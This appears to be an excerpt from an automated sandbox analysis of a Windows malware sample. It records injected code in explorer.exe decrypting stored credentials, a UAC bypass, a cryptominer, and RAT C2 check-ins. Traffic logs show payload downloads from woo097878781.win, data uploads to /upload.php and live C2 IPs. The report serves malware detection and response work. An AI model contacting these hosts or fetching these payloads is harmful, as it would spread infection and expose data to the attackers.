                        Source: C:\Windows\explorer.exeCode function: 33_2_01399E8A CryptReleaseContext,CryptDestroyHash,33_2_01399E8A
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B52D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B52D0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B6640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,35_2_027B6640
                        Source: C:\Windows\explorer.exeCode function: 35_2_027BA4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027BA4A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9AC0 CryptBinaryToStringW,RegGetValueW,35_2_027B9AC0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B49D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B49D0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B6E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,35_2_027B6E70
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B5E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,35_2_027B5E10
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B4FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B4FD0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B4CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B4CD0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,35_2_027B9D30
                        Source: C:\Windows\explorer.exeCode function: 35_2_027BA7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,35_2_027BA7A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B55D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,35_2_027B55D0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,35_2_027B9BF0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B3E70 CryptStringToBinaryA,35_2_027B3E70
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9E4E CryptReleaseContext,CryptDestroyHash,35_2_027B9E4E
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9E27 CryptReleaseContext,CryptDestroyHash,35_2_027B9E27
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9EBF CryptReleaseContext,CryptDestroyHash,35_2_027B9EBF
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9E8A CryptReleaseContext,CryptDestroyHash,35_2_027B9E8A
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F52D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F52D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F6640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,36_2_029F6640
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FA4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029FA4A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9AC0 CryptBinaryToStringW,RegGetValueW,36_2_029F9AC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F49D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F49D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F5E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,36_2_029F5E10
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F6E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,36_2_029F6E70
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F4FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F4FD0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F4CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F4CD0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,36_2_029F9D30
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FA7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,36_2_029FA7A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F55D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,36_2_029F55D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,36_2_029F9BF0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9E8A CryptReleaseContext,CryptDestroyHash,36_2_029F9E8A
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9EBF CryptReleaseContext,CryptDestroyHash,36_2_029F9EBF
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9E27 CryptReleaseContext,CryptDestroyHash,36_2_029F9E27
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9E4E CryptReleaseContext,CryptDestroyHash,36_2_029F9E4E
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F3E70 CryptStringToBinaryA,36_2_029F3E70

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: file.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 4152, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5020, type: MEMORYSTR

                        Bitcoin Miner

                        barindex
                        Yara detected Xmrig cryptocurrency miner
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6196, type: MEMORYSTR
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49756 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49775 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49823 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49857 version: TLS 1.2
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DCA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,0_2_007DCA90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D3620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_007D3620
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_00BE97F0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01397FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,33_2_01397FB0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,35_2_027B7FB0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,36_2_029F7FB0

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49721 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49709 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49714 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49750 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49711 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49728 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49737 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:49709 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49894 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49909 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49916 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49922 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49903 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49930 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49882 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:49882 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50015 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50018 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50017 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50020 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50016 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50019 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50023 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50014 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:50023 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:50014 -> 185.157.162.216:5200
                        Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49756 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 154.216.20.243:443 -> 192.168.2.6:49756
                        Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.6:49774 -> 154.216.20.243:443
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443
                        Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 5200Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorIPs: 185.157.162.216
                        Source: global trafficTCP traffic: 192.168.2.6:49709 -> 185.157.162.216:5200
                        Source: global trafficTCP traffic: 192.168.2.6:49773 -> 37.203.243.102:3333
                        Source: Joe Sandbox ViewASN Name: DAPLDATAPLANETLtdRU DAPLDATAPLANETLtdRU
                        Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49738 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:64191 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49775 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49804 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49823 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49857 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:50012 -> 154.216.20.243:443
                        Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:50021 -> 154.216.20.243:443
                        Source: global trafficHTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: woo097878781.win
                        Source: global trafficHTTP traffic detected: GET /64.EXE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: woo097878781.win
                        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: woo097878781.winUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 419
                        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: woo097878781.winUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 414
                        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: woo097878781.winUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 538
                        Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: woo097878781.winUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 533
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1580 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,setsockopt,setsockopt,WSACreateEvent,WSAEventSelect,CloseHandle,shutdown,closesocket,WaitForMultipleObjects,WaitForSingleObject,WaitForSingleObject,WSAEnumNetworkEvents,shutdown,closesocket,CloseHandle,recv,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,WaitForSingleObject,shutdown,closesocket,CloseHandle,shutdown,closesocket,shutdown,closesocket,CloseHandle,shutdown,closesocket,LocalFree,0_2_007E1580
                        Source: global trafficHTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: woo097878781.win
                        Source: global trafficHTTP traffic detected: GET /64.EXE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: woo097878781.win
                        Source: global trafficDNS traffic detected: DNS query: woo097878781.win
